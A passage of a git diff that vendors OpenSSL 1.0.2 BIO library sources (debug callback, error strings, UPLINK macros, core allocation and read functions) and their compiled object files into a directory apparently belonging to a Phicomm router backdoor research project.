+# define BIO_R_UNABLE_TO_CREATE_SOCKET                    118
+# define BIO_R_UNABLE_TO_LISTEN_SOCKET                    119
+# define BIO_R_UNINITIALIZED                              120
+# define BIO_R_UNSUPPORTED_METHOD                         121
+# define BIO_R_WRITE_TO_READ_ONLY_BIO                     126
+# define BIO_R_WSASTARTUP                                 122
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_cb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_cb.c
new file mode 100644
index 0000000..8715f5c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_cb.c
@@ -0,0 +1,142 @@
+/* crypto/bio/bio_cb.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+
+long MS_CALLBACK BIO_debug_callback(BIO *bio, int cmd, const char *argp,
+                                    int argi, long argl, long ret)
+{
+    BIO *b;
+    MS_STATIC char buf[256];
+    char *p;
+    long r = 1;
+    size_t p_maxlen;
+
+    if (BIO_CB_RETURN & cmd)
+        r = ret;
+
+    BIO_snprintf(buf, sizeof buf, "BIO[%08lX]:", (unsigned long)bio);
+    p = &(buf[14]);
+    p_maxlen = sizeof buf - 14;
+    switch (cmd) {
+    case BIO_CB_FREE:
+        BIO_snprintf(p, p_maxlen, "Free - %s\n", bio->method->name);
+        break;
+    case BIO_CB_READ:
+        if (bio->method->type & BIO_TYPE_DESCRIPTOR)
+            BIO_snprintf(p, p_maxlen, "read(%d,%lu) - %s fd=%d\n",
+                         bio->num, (unsigned long)argi,
+                         bio->method->name, bio->num);
+        else
+            BIO_snprintf(p, p_maxlen, "read(%d,%lu) - %s\n",
+                         bio->num, (unsigned long)argi, bio->method->name);
+        break;
+    case BIO_CB_WRITE:
+        if (bio->method->type & BIO_TYPE_DESCRIPTOR)
+            BIO_snprintf(p, p_maxlen, "write(%d,%lu) - %s fd=%d\n",
+                         bio->num, (unsigned long)argi,
+                         bio->method->name, bio->num);
+        else
+            BIO_snprintf(p, p_maxlen, "write(%d,%lu) - %s\n",
+                         bio->num, (unsigned long)argi, bio->method->name);
+        break;
+    case BIO_CB_PUTS:
+        BIO_snprintf(p, p_maxlen, "puts() - %s\n", bio->method->name);
+        break;
+    case BIO_CB_GETS:
+        BIO_snprintf(p, p_maxlen, "gets(%lu) - %s\n", (unsigned long)argi,
+                     bio->method->name);
+        break;
+    case BIO_CB_CTRL:
+        BIO_snprintf(p, p_maxlen, "ctrl(%lu) - %s\n", (unsigned long)argi,
+                     bio->method->name);
+        break;
+    case BIO_CB_RETURN | BIO_CB_READ:
+        BIO_snprintf(p, p_maxlen, "read return %ld\n", ret);
+        break;
+    case BIO_CB_RETURN | BIO_CB_WRITE:
+        BIO_snprintf(p, p_maxlen, "write return %ld\n", ret);
+        break;
+    case BIO_CB_RETURN | BIO_CB_GETS:
+        BIO_snprintf(p, p_maxlen, "gets return %ld\n", ret);
+        break;
+    case BIO_CB_RETURN | BIO_CB_PUTS:
+        BIO_snprintf(p, p_maxlen, "puts return %ld\n", ret);
+        break;
+    case BIO_CB_RETURN | BIO_CB_CTRL:
+        BIO_snprintf(p, p_maxlen, "ctrl return %ld\n", ret);
+        break;
+    default:
+        BIO_snprintf(p, p_maxlen, "bio callback - unknown type (%d)\n", cmd);
+        break;
+    }
+
+    b = (BIO *)bio->cb_arg;
+    if (b != NULL)
+        BIO_write(b, buf, strlen(buf));
+#if !defined(OPENSSL_NO_STDIO) && !defined(OPENSSL_SYS_WIN16)
+    else
+        fputs(buf, stderr);
+#endif
+    return (r);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_cb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_cb.o
new file mode 100644
index 0000000000000000000000000000000000000000..2badb79228e602562032e84510af73d5a610a72a
GIT binary patch
literal 4184
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
P`A^gJPu4sQ#q9qdEl7h{

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_err.c
new file mode 100644
index 0000000..e8d3027
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_err.c
@@ -0,0 +1,156 @@
+/* crypto/bio/bio_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/bio.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_BIO,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_BIO,0,reason)
+
+static ERR_STRING_DATA BIO_str_functs[] = {
+    {ERR_FUNC(BIO_F_ACPT_STATE), "ACPT_STATE"},
+    {ERR_FUNC(BIO_F_BIO_ACCEPT), "BIO_accept"},
+    {ERR_FUNC(BIO_F_BIO_BER_GET_HEADER), "BIO_BER_GET_HEADER"},
+    {ERR_FUNC(BIO_F_BIO_CALLBACK_CTRL), "BIO_callback_ctrl"},
+    {ERR_FUNC(BIO_F_BIO_CTRL), "BIO_ctrl"},
+    {ERR_FUNC(BIO_F_BIO_GETHOSTBYNAME), "BIO_gethostbyname"},
+    {ERR_FUNC(BIO_F_BIO_GETS), "BIO_gets"},
+    {ERR_FUNC(BIO_F_BIO_GET_ACCEPT_SOCKET), "BIO_get_accept_socket"},
+    {ERR_FUNC(BIO_F_BIO_GET_HOST_IP), "BIO_get_host_ip"},
+    {ERR_FUNC(BIO_F_BIO_GET_PORT), "BIO_get_port"},
+    {ERR_FUNC(BIO_F_BIO_MAKE_PAIR), "BIO_MAKE_PAIR"},
+    {ERR_FUNC(BIO_F_BIO_NEW), "BIO_new"},
+    {ERR_FUNC(BIO_F_BIO_NEW_FILE), "BIO_new_file"},
+    {ERR_FUNC(BIO_F_BIO_NEW_MEM_BUF), "BIO_new_mem_buf"},
+    {ERR_FUNC(BIO_F_BIO_NREAD), "BIO_nread"},
+    {ERR_FUNC(BIO_F_BIO_NREAD0), "BIO_nread0"},
+    {ERR_FUNC(BIO_F_BIO_NWRITE), "BIO_nwrite"},
+    {ERR_FUNC(BIO_F_BIO_NWRITE0), "BIO_nwrite0"},
+    {ERR_FUNC(BIO_F_BIO_PUTS), "BIO_puts"},
+    {ERR_FUNC(BIO_F_BIO_READ), "BIO_read"},
+    {ERR_FUNC(BIO_F_BIO_SOCK_INIT), "BIO_sock_init"},
+    {ERR_FUNC(BIO_F_BIO_WRITE), "BIO_write"},
+    {ERR_FUNC(BIO_F_BUFFER_CTRL), "BUFFER_CTRL"},
+    {ERR_FUNC(BIO_F_CONN_CTRL), "CONN_CTRL"},
+    {ERR_FUNC(BIO_F_CONN_STATE), "CONN_STATE"},
+    {ERR_FUNC(BIO_F_DGRAM_SCTP_READ), "DGRAM_SCTP_READ"},
+    {ERR_FUNC(BIO_F_FILE_CTRL), "FILE_CTRL"},
+    {ERR_FUNC(BIO_F_FILE_READ), "FILE_READ"},
+    {ERR_FUNC(BIO_F_LINEBUFFER_CTRL), "LINEBUFFER_CTRL"},
+    {ERR_FUNC(BIO_F_MEM_READ), "MEM_READ"},
+    {ERR_FUNC(BIO_F_MEM_WRITE), "MEM_WRITE"},
+    {ERR_FUNC(BIO_F_SSL_NEW), "SSL_new"},
+    {ERR_FUNC(BIO_F_WSASTARTUP), "WSASTARTUP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA BIO_str_reasons[] = {
+    {ERR_REASON(BIO_R_ACCEPT_ERROR), "accept error"},
+    {ERR_REASON(BIO_R_BAD_FOPEN_MODE), "bad fopen mode"},
+    {ERR_REASON(BIO_R_BAD_HOSTNAME_LOOKUP), "bad hostname lookup"},
+    {ERR_REASON(BIO_R_BROKEN_PIPE), "broken pipe"},
+    {ERR_REASON(BIO_R_CONNECT_ERROR), "connect error"},
+    {ERR_REASON(BIO_R_EOF_ON_MEMORY_BIO), "EOF on memory BIO"},
+    {ERR_REASON(BIO_R_ERROR_SETTING_NBIO), "error setting nbio"},
+    {ERR_REASON(BIO_R_ERROR_SETTING_NBIO_ON_ACCEPTED_SOCKET),
+     "error setting nbio on accepted socket"},
+    {ERR_REASON(BIO_R_ERROR_SETTING_NBIO_ON_ACCEPT_SOCKET),
+     "error setting nbio on accept socket"},
+    {ERR_REASON(BIO_R_GETHOSTBYNAME_ADDR_IS_NOT_AF_INET),
+     "gethostbyname addr is not af inet"},
+    {ERR_REASON(BIO_R_INVALID_ARGUMENT), "invalid argument"},
+    {ERR_REASON(BIO_R_INVALID_IP_ADDRESS), "invalid ip address"},
+    {ERR_REASON(BIO_R_IN_USE), "in use"},
+    {ERR_REASON(BIO_R_KEEPALIVE), "keepalive"},
+    {ERR_REASON(BIO_R_NBIO_CONNECT_ERROR), "nbio connect error"},
+    {ERR_REASON(BIO_R_NO_ACCEPT_PORT_SPECIFIED), "no accept port specified"},
+    {ERR_REASON(BIO_R_NO_HOSTNAME_SPECIFIED), "no hostname specified"},
+    {ERR_REASON(BIO_R_NO_PORT_DEFINED), "no port defined"},
+    {ERR_REASON(BIO_R_NO_PORT_SPECIFIED), "no port specified"},
+    {ERR_REASON(BIO_R_NO_SUCH_FILE), "no such file"},
+    {ERR_REASON(BIO_R_NULL_PARAMETER), "null parameter"},
+    {ERR_REASON(BIO_R_TAG_MISMATCH), "tag mismatch"},
+    {ERR_REASON(BIO_R_UNABLE_TO_BIND_SOCKET), "unable to bind socket"},
+    {ERR_REASON(BIO_R_UNABLE_TO_CREATE_SOCKET), "unable to create socket"},
+    {ERR_REASON(BIO_R_UNABLE_TO_LISTEN_SOCKET), "unable to listen socket"},
+    {ERR_REASON(BIO_R_UNINITIALIZED), "uninitialized"},
+    {ERR_REASON(BIO_R_UNSUPPORTED_METHOD), "unsupported method"},
+    {ERR_REASON(BIO_R_WRITE_TO_READ_ONLY_BIO), "write to read only BIO"},
+    {ERR_REASON(BIO_R_WSASTARTUP), "WSAStartup"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_BIO_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(BIO_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, BIO_str_functs);
+        ERR_load_strings(0, BIO_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..d0ada09b6ffa08bd3183adca610093f2e333ef61
GIT binary patch
literal 1360
zcmbtS%}T>S5S|#d{((Pu5GoQ+D(ceugXlquQbiDzg5X6$T4NR4q$FFY9`qIZC_aMV
z3-}lw6>na2CfSXfwIb-iWM;mdZ+^0SSKQy}G7OMnz$Sb}5(PNw`tl2rTYw=Lgty_T
z_ea>>-rlfgkIPMuH?4KH%yNtQwPqCNZ<lf`w=x&Q(2d*?)E?B`gJZz54}_VhB;&CG
z<E8{gYsAP7W%}AU5aE;JjJUrE?a&RcAD!~djvLYp%90AvOr}#nbj@gsG)9pLz2CtI
z&-{SXA4tm}hGWW{$<F0V-*$t5RiIcZ*)`uev$ysR?T`nTUNr<ul%Y*h+pzGu&Ydza
z%#7`Y^tjvNz|I`*04s+fu!>)=yB=bm&s~Psv>0-yawX!b*JO>rZ@2-!1{SzAhq)K_
zdEnGt(fl7Ki(I-p{SOvI&E!9bm~vH_#(*&Sp5$3kI-1q_GkD&I`d9t}a;atxRTbHP
zUIo#Y{iR)1Fg3NI28u6v5~4oz%2IcavE*Cmt3tb~a*6@f)cI|Zr0=EkPcV;Ob3x=w
z^CSkH5I{d#np5&6-l;cH9_WMe5*rvmOEq*pVfx(><zDo+C{RSe2{MXaC;qcYtR|VU
Hqw_xjpzlwe

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lcl.h
new file mode 100644
index 0000000..741884d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lcl.h
@@ -0,0 +1,36 @@
+#include <openssl/bio.h>
+
+#if BIO_FLAGS_UPLINK==0
+/* Shortcut UPLINK calls on most platforms... */
+# define UP_stdin        stdin
+# define UP_stdout       stdout
+# define UP_stderr       stderr
+# define UP_fprintf      fprintf
+# define UP_fgets        fgets
+# define UP_fread        fread
+# define UP_fwrite       fwrite
+# undef  UP_fsetmod
+# define UP_feof         feof
+# define UP_fclose       fclose
+
+# define UP_fopen        fopen
+# define UP_fseek        fseek
+# define UP_ftell        ftell
+# define UP_fflush       fflush
+# define UP_ferror       ferror
+# ifdef _WIN32
+#  define UP_fileno       _fileno
+#  define UP_open         _open
+#  define UP_read         _read
+#  define UP_write        _write
+#  define UP_lseek        _lseek
+#  define UP_close        _close
+# else
+#  define UP_fileno       fileno
+#  define UP_open         open
+#  define UP_read         read
+#  define UP_write        write
+#  define UP_lseek        lseek
+#  define UP_close        close
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lib.c
new file mode 100644
index 0000000..5267010
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lib.c
@@ -0,0 +1,594 @@
+/* crypto/bio/bio_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#include <openssl/stack.h>
+
+BIO *BIO_new(BIO_METHOD *method)
+{
+    BIO *ret = NULL;
+
+    ret = (BIO *)OPENSSL_malloc(sizeof(BIO));
+    if (ret == NULL) {
+        BIOerr(BIO_F_BIO_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    if (!BIO_set(ret, method)) {
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
+
+int BIO_set(BIO *bio, BIO_METHOD *method)
+{
+    bio->method = method;
+    bio->callback = NULL;
+    bio->cb_arg = NULL;
+    bio->init = 0;
+    bio->shutdown = 1;
+    bio->flags = 0;
+    bio->retry_reason = 0;
+    bio->num = 0;
+    bio->ptr = NULL;
+    bio->prev_bio = NULL;
+    bio->next_bio = NULL;
+    bio->references = 1;
+    bio->num_read = 0L;
+    bio->num_write = 0L;
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_BIO, bio, &bio->ex_data);
+    if (method->create != NULL)
+        if (!method->create(bio)) {
+            CRYPTO_free_ex_data(CRYPTO_EX_INDEX_BIO, bio, &bio->ex_data);
+            return (0);
+        }
+    return (1);
+}
+
+int BIO_free(BIO *a)
+{
+    int i;
+
+    if (a == NULL)
+        return (0);
+
+    i = CRYPTO_add(&a->references, -1, CRYPTO_LOCK_BIO);
+#ifdef REF_PRINT
+    REF_PRINT("BIO", a);
+#endif
+    if (i > 0)
+        return (1);
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "BIO_free, bad reference count\n");
+        abort();
+    }
+#endif
+    if ((a->callback != NULL) &&
+        ((i = (int)a->callback(a, BIO_CB_FREE, NULL, 0, 0L, 1L)) <= 0))
+        return (i);
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_BIO, a, &a->ex_data);
+
+    if ((a->method != NULL) && (a->method->destroy != NULL))
+        a->method->destroy(a);
+    OPENSSL_free(a);
+    return (1);
+}
+
+void BIO_vfree(BIO *a)
+{
+    BIO_free(a);
+}
+
+void BIO_clear_flags(BIO *b, int flags)
+{
+    b->flags &= ~flags;
+}
+
+int BIO_test_flags(const BIO *b, int flags)
+{
+    return (b->flags & flags);
+}
+
+void BIO_set_flags(BIO *b, int flags)
+{
+    b->flags |= flags;
+}
+
+long (*BIO_get_callback(const BIO *b)) (struct bio_st *, int, const char *,
+                                        int, long, long) {
+    return b->callback;
+}
+
+void BIO_set_callback(BIO *b,
+                      long (*cb) (struct bio_st *, int, const char *, int,
+                                  long, long))
+{
+    b->callback = cb;
+}
+
+void BIO_set_callback_arg(BIO *b, char *arg)
+{
+    b->cb_arg = arg;
+}
+
+char *BIO_get_callback_arg(const BIO *b)
+{
+    return b->cb_arg;
+}
+
+const char *BIO_method_name(const BIO *b)
+{
+    return b->method->name;
+}
+
+int BIO_method_type(const BIO *b)
+{
+    return b->method->type;
+}
+
+int BIO_read(BIO *b, void *out, int outl)
+{
+    int i;
+    long (*cb) (BIO *, int, const char *, int, long, long);
+
+    if ((b == NULL) || (b->method == NULL) || (b->method->bread == NULL)) {
+        BIOerr(BIO_F_BIO_READ, BIO_R_UNSUPPORTED_METHOD);
+        return (-2);
+    }
+
+    cb = b->callback;
+    if ((cb != NULL) &&
+        ((i = (int)cb(b, BIO_CB_READ, out, outl, 0L, 1L)) <= 0))
+        return (i);
+
+    if (!b->init) {
+        BIOerr(BIO_F_BIO_READ, BIO_R_UNINITIALIZED);
+        return (-2);
+    }
